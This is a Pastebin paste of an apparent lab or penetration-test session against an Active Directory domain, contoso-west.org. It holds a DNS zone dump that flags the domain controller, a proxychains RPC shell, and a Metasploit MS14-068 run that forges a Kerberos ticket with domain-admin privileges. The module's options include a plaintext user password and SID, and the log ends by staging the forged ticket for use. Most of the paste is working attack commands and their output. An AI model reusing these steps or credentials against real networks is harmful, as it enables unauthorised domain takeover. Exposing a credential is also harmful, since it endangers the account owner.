API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Nov 9th, 2018
166
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.04 KB | None | 0 0
raw download clone embed print report
  1. C:\Users\Admin\Desktop\Confidential data>type dns.contoso-west.org
  2. type dns.contoso-west.org
  3. > ls -d contoso-west.org
  4. [dc2008r2-group1.contoso-west.org]
  5. contoso-west.org. SOA dc2008r2-group1.contoso-west.org hostmaster.contoso-west.org. (292 900 600 86400 3600)
  6. contoso-west.org. A 10.0.0.149
  7. contoso-west.org. NS dc2008r2-group1.contoso-west.org
  8. contoso-west.org. NS dcslave2008-group1.contoso-west.org
  9. contoso-west.org. TXT "The DNS for the contoso-west.org domain is dc2008r2-group1.contoso-west.org."
  10.  
  11. _msdcs NS dc2008r2-group1.contoso-west.org
  12. _gc._tcp.Default-First-Site-Name._sites SRV priority=0, weight=100, port=3268, dc2008r2-group1.contoso-west.org
  13. _kerberos._tcp.Default-First-Site-Name._sites SRV priority=0, weight=100, port=88, dc2008r2-group1.contoso-west.org
  14. _ldap._tcp.Default-First-Site-Name._sites SRV priority=0, weight=100, port=389, dc2008r2-group1.contoso-west.org
  15. _gc._tcp SRV priority=0, weight=100, port=3268, dc2008r2-group1.contoso-west.org
  16. _kerberos._tcp SRV priority=0, weight=100, port=88, dc2008r2-group1.contoso-west.org
  17. _kpasswd._tcp SRV priority=0, weight=100, port=464, dc2008r2-group1.contoso-west.org
  18. _ldap._tcp SRV priority=0, weight=100, port=389, dc2008r2-group1.contoso-west.org
  19. _kerberos._udp SRV priority=0, weight=100, port=88, dc2008r2-group1.contoso-west.org
  20. _kpasswd._udp SRV priority=0, weight=100, port=464, dc2008r2-group1.contoso-west.org
  21. --> dc2008r2-group1 A 10.0.0.149 <--- DOMENEKONTROLLER???
  22. dcslave2008-group1 A 10.0.0.148
  23. DomainDnsZones A 10.0.0.149
  24.  
  25.  
  26. proxychains net rpc -W contoso-west.org -U blot -S 10.0.0.149 shell
  27. ProxyChains-3.1 (http://proxychains.sf.net)
  28. Enter blot's password:
  29. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
  30. Talking to domain CONTOSO-WEST (S-1-5-21-3039018489-1111549232-2925702125)
  31. net rpc> user
  32. net rpc user> show
  33. Usage: net rpc user show <username>
  34. net rpc user show failed: NT_STATUS_INVALID_PARAMETER
  35. net rpc user> show blot
  36. user rid: 1109, group rid: 513
  37. net rpc user> packet_write_wait: Connection to 2001:700:300:7::85 port 22: Broken pipe
  38.  
  39.  
  40. auxiliary/admin/kerberos/ms14_068_kerberos_checksum
  41.  
  42.  
  43. msf auxiliary(ms14_068_kerberos_checksum) > show info
  44.  
  45. Name: MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
  46. Module: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
  47. License: Metasploit Framework License (BSD)
  48. Rank: Normal
  49. Disclosed: 2014-11-18
  50.  
  51. Provided by:
  52. Tom Maddock
  53. Sylvain Monne
  54. juan vazquez <juan.vazquez@metasploit.com>
  55.  
  56. Basic options:
  57. Name Current Setting Required Description
  58. ---- --------------- -------- -----------
  59. DOMAIN yes The Domain (upper case) Ex: DEMO.LOCAL
  60. PASSWORD yes The Domain User password
  61. RHOST yes The target address
  62. RPORT 88 yes The target port
  63. Timeout 10 yes The TCP timeout to establish connection and read data
  64. USER yes The Domain User
  65. USER_SID yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
  66.  
  67. Description:
  68. This module exploits a vulnerability in the Microsoft Kerberos
  69. implementation. The problem exists in the verification of the
  70. Privilege Attribute Certificate (PAC) from a Kerberos TGS request,
  71. where a domain user may forge a PAC with arbitrary privileges,
  72. including Domain Administrator. This module requests a TGT ticket
  73. with a forged PAC and exports it to a MIT Kerberos Credential Cache
  74. file. It can be loaded on Windows systems with the Mimikatz help. It
  75. has been tested successfully on Windows 2008.
  76.  
  77. References:
  78. https://cvedetails.com/cve/CVE-2014-6324/
  79. https://technet.microsoft.com/en-us/library/security/MS14-068
  80. OSVDB (114751)
  81. http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx
  82. https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/
  83. https://github.com/bidord/pykek
  84. https://community.rapid7.com/community/metasploit/blog/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit
  85.  
  86.  
  87.  
  88. msf auxiliary(ms14_068_kerberos_checksum) > set DOMAIN contoso-west.org
  89. DOMAIN => contoso-west.org
  90. msf auxiliary(ms14_068_kerberos_checksum) > set RHOST 10.0.0.149
  91. RHOST => 10.0.0.149
  92. msf auxiliary(ms14_068_kerberos_checksum) > set USER blot
  93. USER => blot
  94. msf auxiliary(ms14_068_kerberos_checksum) > set user_sid S-1-5-21-3039018489-1111549232-2925702125-1109
  95. user_sid => S-1-5-21-3039018489-1111549232-2925702125-1109
  96. msf auxiliary(ms14_068_kerberos_checksum) > set PASSWORD Bl0tt12309-
  97. msf auxiliary(ms14_068_kerberos_checksum) > show options
  98.  
  99. Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):
  100.  
  101. Name Current Setting Required Description
  102. ---- --------------- -------- -----------
  103. DOMAIN contoso-west.org yes The Domain (upper case) Ex: DEMO.LOCAL
  104. PASSWORD Bl0tt12309- yes The Domain User password
  105. RHOST 10.0.0.149 yes The target address
  106. RPORT 88 yes The target port
  107. Timeout 10 yes The TCP timeout to establish connection and read data
  108. USER blot yes The Domain User
  109. USER_SID S-1-5-21-3039018489-1111549232-2925702125-1109 yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
  110.  
  111.  
  112. msf auxiliary(ms14_068_kerberos_checksum) > run
  113.  
  114. [*] Validating options...
  115. [*] Using domain CONTOSO-WEST.ORG...
  116. [*] 10.0.0.149:88 - Sending AS-REQ...
  117. [*] 10.0.0.149:88 - Parsing AS-REP...
  118. [*] 10.0.0.149:88 - Sending TGS-REQ...
  119. [+] 10.0.0.149:88 - Valid TGS-Response, extracting credentials...
  120. [+] 10.0.0.149:88 - MIT Credential Cache saved on /root/.msf4/loot/20181109211513_default_10.0.0.149_windows.kerberos_173395.bin
  121. [*] Auxiliary module execution completed
  122.  
  123. root@10-kali2-group10:~/.msf4/loot# ls
  124. 20181010173151_default_192.168.40.14_192.168.40.14_ce_775643.crt
  125. 20181010173151_default_192.168.40.14_192.168.40.14_ke_958653.key
  126. 20181010173151_default_192.168.40.14_192.168.40.14_pe_462147.pem
  127. 20181109211513_default_10.0.0.149_windows.kerberos_173395.bin
  128. root@10-kali2-group10:~/.msf4/loot#
  129.  
  130.  
  131. To use this ticket, which is in the Credential Cache (ccache) format, we need to move it to the /tmp directory where the Kerberos tools look for tickets
  132.  
  133. root@10-kali2-group10:~/.msf4/loot# mv 20181109211513_default_10.0.0.149_windows.kerberos_173395.bin /tmp/krb5cc
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!